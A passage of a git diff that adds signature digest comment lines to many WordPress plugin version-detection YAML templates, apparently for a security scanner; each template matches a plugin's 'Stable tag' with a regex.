4a0a0047304502206ab8c36aaaac556056cf9f559856cf180547d99f7061a1e477aedcd96cfdfdc00221009c0475b08d5358f007fcfd298c460507237fa9a5cb4f2502c0258d06aeee92d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb856..088c5d768a3 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a388d964cda6ce890cf8371ca2af110e20dba2fa79f7566e69c1a5149ef0b9670220499f6dcd84f30b4f6beda5172a6c1f2b58a23d9d5bf68ac5d0110e55b4dc47f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c63..b0416aea176 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b611f8cc8d94d21bb2ad69ea7ea1c2d029b27795cf97d42308bc131e175bd02a02205ae253538fded0b1e320170831b74e0588c40aba36394565263c368aa1f84432:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a342590..cd35b6852c5 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022057847e86f4e979d7321f26c305f4325e80a5f9f061047db22933ec335f3cc5d40220773dc8aaf89c9acf7f05cc2fe3b9f38f72800493bf6d8fb23cf6c2582c802a93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a4..b492259725d 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206830193716166df911568cab3e7d6ec4bfc796d58cbb0f6120ef4fa5fef0a9600220795b68d8355902ac54279b8279a030812e85929f0326772eab229698e9444756:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4be..6ab6fe1857d 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100beb785a9e4d69ab3178c5849b6f1a8c15b3aa25aa19cb7f11d255b085d85dd85022100cded374998ee7ca7200e9393618e26c97000a16fdeb87c9d3f05dc6f34670bad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed14..260bdd0b29f 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022040b3d1faef230d8be754882ce985f16c4a5c035105fe24f1b92ce596bc28c64102205f2bf89c7811c9226fe2b901b5f5f9f81f61e40190e4f47bb5b30c7c19de36ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274b..2262dd822bf 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ef63bff8df8caf334edd220d15dd71e9faa82ae57949ebac7d5cec174675cd76022100dfefce3818dc25208e445ac809436ebfea915a8e593b7b718dfe7fac0634bd1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec66..d6efba4e317 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206eb440d991569aadd61685405f04e76d630cd661c12a03edc9da94d25bc03a380220783ded88acbe962891bf378e982ba7d1c32a4a31f6e80f7794e9b662bcab8903:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6c..5b4adc339d7 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203b449aa05cc7772b0d3b99f0e02dd6669139ceacd7d0688c50bfa3abc572a03a02206cd534622bf5d253eef38d3da8edc8449fe3bc002453abd8cac5846954ebe5c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35a..6524c3e39b7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b40f9c9009a778b48ac8e103b61471ab8c02df63020e945920f79fde3120e8c0022041a028670298dad115a9b0a3201b3c6a7b43eed624a3cd6b68ee9d4ea328ede8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4fa..d44ac6f3c0c 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022034e47f55df28d3cc395ff3994d4897692e075c01a100eb0a9e751d033c64cc7e022100bdc15fc9f9de350832157a7ee2b998fd0d3b4896d048dcfbabddbfffb288050b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf72..3464450509a 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203055ba348257950a08f743d4b8ed4fa68ecae5258a1a3a50f1d9b64e67d64a600220792b43bba2b9907de0116b224403c9c236ca89fa8f41eb497ddc4bb147e0b163:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f7..6edbbef6396 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206c7cfbeb34e7c4058e4d2e433c79e8c8a1eec1009df9992c4042a9bac388011b022074d0c36b4d6ebc4cd43f2b2bd966e04ecbf997a667a12d8eabd54695c7f86eb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf10..755e73a9ffd 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205538a8e5786fcae19b0e505e0efbdcbae34fe6a46116b02ef8ab52108fd45f6602206332df2cefe682fbabba3bb3a0a58a45970d880db84c4692168c56071e1571cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7cf..48cedfb5dd2 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ab8efd55600a6feb97f0bff3b2695b2a82f7300e542d2e3835cfb4e76a497573022100abbd747562da9c053bfbec900a5796d0419dfe23c77c4a556265834fbd2f4c58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb44838..54b9dbfd62c 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e900f42129cdd40e5ba9bec8fc845392ea4149ca1de868a0f49144b8ac0491e702201ba0932284d21dc009081dd43b0274a889bad4c029f308fda58a114403f67781:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdfc..79a0ba45995 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022025682fb39ca2080c465ef246fcca5bf21f27449c66e356f4afc7fcbb5d0f27d9022100c77ccabbce4f82aee21f6e9128a05df2b48a658d4c437ccbb81cde37e909b8f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b4..1cce1a6482c 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f3c115ad1b6bc865e4af4702ada3674abe546751fa444d1456c2be37a301febe022100c4507da89c53b586fca773a26421f641c0e81837e777257c11e38b7ebc7f47fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbbab..51a3670296a 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e168b89f7f3017f78ab9f95e8f8f44995ec31fc063cb36efb1c31b65754b0793022027ea98781d3f4b8c552455547e6d97bb13cf7d2e7421b0d5daeed110d8997770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb9..63b34616c22 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008450cb3d227ec4e59c05583c6ff608f40cca5c65a7b56ea355cc3a42f1e4737a022100ccfc7227c7bee39e5ed234b74327e34bfb97b4da7c8ddbac5a396c8c16b9eae8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d1..cbbe6b7d5bc 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a4b71c3bdb87853c92c02fb95a90c02c1b52b6ff19a10893b28aa8be88bcf9da0221009b2127b546ab9396f54090cb741bca6744889f145ba5c875332f45e6e8f554fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d1..2ffd4ab2d9e 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009f1fc1ec179b8f103c197708466e876043d01701734007023d10663f69eda10002204ddaa9a8e2c56acad4622e11c1a21612c7e14cacff2a713ab89034a98b8a58b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a90..23223eb3686 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206352c15639aa03b2a1b0e4175e5e36be014131f350e4732d1ba5ff09e77f882f022100d9cc00c400eb37dd7cd3c73eb5ec6c2473e75ea79d2cad7cac581fcc01b34a32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa297068720..8dd23fc1ec0 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e6b3455b9a4067bac9e177492e003d96a76efe26c257360bb7c0e58a9fe24ad60220387aeddc681702fc5928821a4c6ebe648d755490be49af59fae2a6702895d0d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7ed..d99d72e3b7b 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009f2385cd16916bd9272cdaa3110d0d9924790b97ecd7fbc82eb3e243ad64f7450220684f58ceac840ff56a87fd34907d4df7b14c3e6c865ec41a74268eea14d488cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e83e8d79e78..f8b12a99a1d 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e53b6bf3d1a47c96dbcacf1600910e815978dacba61cb162c36de87b9be3b80d022064deea85fae7d961718b7aa7a74f6208fdd4eb1a4465afbf1a5b850159866284:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2a..27661e088e6 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fd7ecf3ce26da302c91d4753eee96f597b4014c5f2bf8015f42d0537e3815d01022100a063674b8c59a511ea08057a0b6eca9c77ef73f781d931e99898fdee3df172eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8a..c4348a5c99b 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206b0d61d63a56586e6efa862c03cc72df0a4c282dd47c2596a9db1a416fdc7a3402203b811de7eab61537ed67ede0c8adecafdbfe52ceffbe5fcb7dfe09e1ae09388e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5c..a93beeeceac 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022040711480084a93ba22eb1541db54de58a0972570b7150695d258f294ca05c55902210084fa094a0e92fb6f2da40f10015478c9c1adc36562d3dfcbc55f44ef6cb234e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d97506..b16859adb04 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220312ad6709cddcbf96208dc1e5b534d3972eee20b78045c2cecdd493fd3c4cf770221009c1b7af188df7f0c7431d02d8ab32fc9f1667a8e295b51e86376589ac171d7f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab22..6d14910d5eb 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210097c53d10d1c8bec404c9ba48eda64528432d61703c9e1b8dee4621ca8e0e7e26022069ba4262f9924757d8881ab03af7e6c3148968c9f6666ba3765ce573ec31a754:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f8..bbc5beffa46 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022050cd3ff6bae166fe13287482302834e9aebaa90ce864fefc950644e6b37205f2022100fb4e889a5cb3349894dd5e0be8d3eb6f25cb1f6377c7a9b97cc5ba5e4d37b5b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a8..3a5b468aecf 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220640f01ffe2f57fa6404d9841632e5052d3658f4d344bccb8a7d83ede8f285319022100e128f6a42eb9f602478f28fc40b0493c60ec522d05ebd3349e1ba5eeecfb0413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8b..0ca9c2dc827 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204884b4363520d673abd8639b6785dc1f6610405a9692c1f31320948c4bbf87b2022051e5ee53a2d9294649756b8698c1c959b18631df17811778523799fca3c15810:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486a..e812464596f 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100da74bbd37026d5cd063bd2d87c78c3a629a04ba4a33f7b7ade0f0fcefa3da5400221009cf140458d03ec33fe8923a350fe00ce48073fb144cbac680c21b9694eb01ffa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a69..33a39b64b39 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201fd43dbc93360a51cc2a564d9ecd71ab3758c21dc4a478c22ad8f6cedcd5c114022100ad802f0d4d9e753554590909f1804df1a3a566a7b39b670c164ea65db9aa87a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc839..5314ea40df5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203ebdc3d8b7d35808d2444a5285d56c860763f57714b3c3fe4c91bd0f3259ea74022100a4857731f7e6c83914ebecde533e4b9b5f749eac7254d1560ebc229d06e03d49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb8..0c0969c565d 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ea68c91c8830eb8dbaf647993731d68b932c0609f8795182c56cf277bdea0de5022100f71936fa98b175c5b374d77a75ed1c685635b90b96ea237f327c556deea64192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53a..5a4cd5564fa 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f85aa1d32ce9f0ba00add38a888bd198c4558b23dec6e0a51f988daf477d9243022100f0120f47540596c487de15c2e35e7679f3408664a016461a761446f929e1c9f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f01359..5cbb7d535a5 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cad53f3b3e6bfec34e3444cb3af249ae68728edc4328ff4cf14f8cbf75a15440022100bbb815bd4cba8077aeca58f4a4f67ae691816eb22d0744f261c774c415d23fb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c7..16752dccf44 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022068c0de38750dcdb94e771ec1770d6688de688c80fd559528d3d9230c29db8d250221009df9528d539b814dce0a82227738e0dbc33b213df5ef0237bc0ae4231205e435:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd7..94e42f526c2 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200c2a2eb5025231d4b690840b146fb34b60ffa55b5b86f8b439702057805ed3670220649f409630965c3c379d3fc03c7f7ce0046ecaeaa4514d3775abb9f977b88b96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08d..db0c84ea047 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071166a051005f218f2cd445d3261588472d2c99a7b3a42ef3a7fcd19c507738202205215b0035c6610ea908c54da825fb41ab4afdbfb4dbb38b21afbd124abc78195:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e99..a46072bcddc 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c662b200972c4730bac3abe62c83116ecf270217c1b521b4ac4f1b15083c22e4022100c630fb06096715824cb19c28a65aa5699a486b2965a02507afb43001ba3d1d3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf55667..141cbe93d01 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220439e8bd3d1b6bd98414a3714fcc4bd5d732b8135c803ea7ec34be98fc1de4956022100d647bd858801603516b9aeebc66c3fb07666203f4ffb8b33da236e3a50403b53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac74..12d2b56effc 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 